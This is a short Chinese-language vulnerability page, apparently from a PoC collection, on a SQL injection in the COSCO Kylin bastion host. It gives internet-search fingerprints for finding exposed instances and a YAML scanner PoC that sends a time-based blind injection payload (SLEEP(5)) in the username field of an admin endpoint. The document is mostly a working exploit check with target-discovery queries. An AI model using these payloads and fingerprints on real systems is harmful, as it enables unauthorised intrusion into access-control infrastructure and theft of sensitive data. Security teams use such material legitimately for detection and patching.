36 lines
1.4 KiB
Markdown
36 lines
1.4 KiB
Markdown
## 中远麒麟堡垒机SQL注入
|
||
麒麟堡垒机用于运维管理的认证、授权、审计等监控管理。中远麒麟堡垒机存在SQL注入,可利用该漏洞获取系统敏感信息。
|
||
检索条件:
|
||
cert="Baolei"||title="麒麟堡垒机"||body="admin.php?controller=admin_index&action=get_user_login_fristauth"||body="admin.php?controller=admin_index&action=login"
|
||
|
||
```
|
||
poc:
|
||
relative: req0 && req1
|
||
session: false
|
||
requests:
|
||
- method: POST
|
||
timeout: 10
|
||
path: /admin.php?controller=admin_commonuser
|
||
headers:
|
||
Content-Type: application/x-www-form-urlencoded
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
|
||
like Gecko) Chrome/69.0.2786.81 Safari/537.36
|
||
data: username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
|
||
follow_redirects: true
|
||
matches: (code.eq("200") && time.gt("5") && time.lt("10"))
|
||
- method: POST
|
||
timeout: 10
|
||
path: /admin.php?controller=admin_commonuser
|
||
headers:
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
|
||
like Gecko) Chrome/69.0.2786.81 Safari/537.36
|
||
Content-Type: application/x-www-form-urlencoded
|
||
data: username=admin
|
||
follow_redirects: true
|
||
matches: time.lt("5")
|
||
|
||
```
|
||
检索条件:
|
||
cert="Baolei" 或 title="麒麟堡垒机" 或 body="admin.php?controller=admin_index&action=get_user_login_fristauth" 或 body="admin.php?controller=admin_index&action=login"
|
||
|